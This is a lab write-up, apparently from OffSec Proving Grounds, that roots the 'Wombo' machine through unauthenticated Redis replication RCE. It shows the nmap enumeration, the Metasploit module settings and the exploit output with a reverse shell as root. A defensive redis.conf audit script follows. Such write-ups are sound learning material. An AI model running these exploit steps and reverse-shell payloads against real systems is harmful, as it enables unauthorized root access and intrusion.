Wombo - OSPG


Summary

In this writeup, we exploit an exposed, unauthenticated Redis service to obtain root access on the target system.


Enumeration

Nmap

We begin with a full-port nmap scan with version detection.

$ sudo nmap --open -sV -A -p- -vv -n -Pn $IP
PORT      STATE SERVICE    REASON         VERSION
22/tcp    open  ssh        syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 09:80:39:ef:3f:61:a8:d9:e6:fb:04:94:23:c9:ef:a8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGBXRhQCez7/IOdnHzLYdpVtWWRMN/7bUR/C3T/W6V9DwlKUS2AfdncLdLwqnx61jODFdXDrTdEdTAtK4MHuXt/UOLDXr1SOfUHYQbZd1rmpMaeB3qOKfoVP7NMp2Ga68kT/9NvBphakYXRWw4C7RS0N+4YWU/BjSyMTIdnhJX05lC5Uyljg7FliJ7d3J/CtF98I6Oo5u/Eb2/5BB45/1IuM6R7BGCDOpIs6po1FyEk8gFktbB+INGATdBPxvmAOX6G7m/R491a9/QtaF8wrgsjS3fQftoiW8vwcaom8Bmu94xZ9pZq0Dgt9VWQz241T5dGQrp57s6Djl/V83/qGFP
|   256 83:f8:6f:50:7a:62:05:aa:15:44:10:f5:4a:c2:f5:a6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLg0oQ1t4NCz+KWPtrCjgDf+qjW2Vb4oOc/eM21vT9rIPJa//rO0LFT8czDxcWFU9HMSEohfSm8emC4lShgGrY4=
|   256 1e:2b:13:30:5c:f1:31:15:b4:e8:f3:d2:c4:e8:05:b5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPS81xs7EU6k92rNFdmsDF7qcRDxDILJUeva18aKW1GV
80/tcp    open  http       syn-ack ttl 63 nginx 1.10.3
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
6379/tcp  open  redis      syn-ack ttl 63 Redis key-value store 5.0.9
8080/tcp  open  http-proxy syn-ack ttl 63
27017/tcp open  mongod?    syn-ack ttl 63
  • Several services are exposed (SSH, nginx on 80, an HTTP proxy on 8080, MongoDB on 27017 and Redis on 6379). After enumerating all of them, the Redis 5.0.9 instance on port 6379 is the one we focus on.

Exploitation

Redis RCE

A quick search shows that Redis 5.0.9, when reachable without authentication, is vulnerable to unauthenticated remote code execution via its replication and module-loading features.

$ searchsploit redis
---------------------------------------------------------------- ---------------------------------
 Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------------------
...
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)   | linux/remote/47195.rb
...
---------------------------------------------------------------- ---------------------------------

Within the Metasploit console, we configure the module as follows.

msf6 exploit(linux/redis/redis_replication_cmd_exec) > options

Module options (exploit/linux/redis/redis_replication_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    true             yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS    192.168.106.69   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   192.168.49.106   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   6379             yes       The local port to listen on.


Payload options (linux/x64/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.49.106   yes       The listen address (an interface may be specified)
   LPORT  8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Then we run exploit.

msf6 exploit(linux/redis/redis_replication_cmd_exec) > exploit

[*] Started reverse TCP handler on 192.168.49.106:8080 
[*] 192.168.106.69:6379   - Compile redis module extension file
[+] 192.168.106.69:6379   - Payload generated successfully! 
[*] 192.168.106.69:6379   - Listening on 192.168.49.106:6379
[*] 192.168.106.69:6379   - Rogue server close...
[*] 192.168.106.69:6379   - Sending command to trigger payload.
[*] Sending stage (38 bytes) to 192.168.106.69
[*] Command shell session 1 opened (192.168.49.106:8080 -> 192.168.106.69:35962) at 2021-09-05 11:43:12 +1000
[!] 192.168.106.69:6379   - This exploit may require manual cleanup of './ahltczis.so' on the target

root@wombo:/# id
uid=0(root) gid=0(root) groups=0(root)

No further privilege escalation is needed, since the shell returned by the exploit already runs as root.
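From the defender's side, the path used above needs a Redis that is reachable from the network, accepts commands without a password, and still allows REPLICAOF/SLAVEOF and MODULE LOAD. Those conditions can be audited from redis.conf. The script below is an added example, not part of the original writeup; the two configuration fragments are constructed samples, not files from the target.

```python
# Audit a redis.conf for the settings that make the replication-based
# module-loading RCE viable. Constructed sample configs follow.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass use-a-long-random-secret
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command CONFIG ""
"""

# Commands an attacker needs to point the instance at a rogue master and load a .so.
DANGEROUS = ("SLAVEOF", "REPLICAOF", "MODULE", "CONFIG")

def parse_conf(text):
    """Return (directives dict, set of commands disabled via rename-command)."""
    directives, renamed = {}, set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        key, _, value = line.partition(" ")
        key = key.lower()
        if key == "rename-command":
            renamed.add(value.split()[0].upper())  # e.g. 'rename-command SLAVEOF ""'
        else:
            directives[key] = value.strip().strip('"')
    return directives, renamed

def audit(text):
    """List the findings that together allow unauthenticated replication RCE."""
    d, renamed = parse_conf(text)
    findings = []
    bind = d.get("bind", "")   # with no bind directive Redis listens on every interface
    if not bind or any(a in ("0.0.0.0", "::", "*") for a in bind.split()):
        findings.append("listens on all interfaces (no restrictive bind)")
    if d.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode disabled")
    if not d.get("requirepass"):
        findings.append("no requirepass: unauthenticated access")
    findings += [f"{c} not renamed/disabled" for c in DANGEROUS if c not in renamed]
    return findings
```

Running audit() on WEAK_CONF reports seven findings; on HARDENED_CONF it reports none.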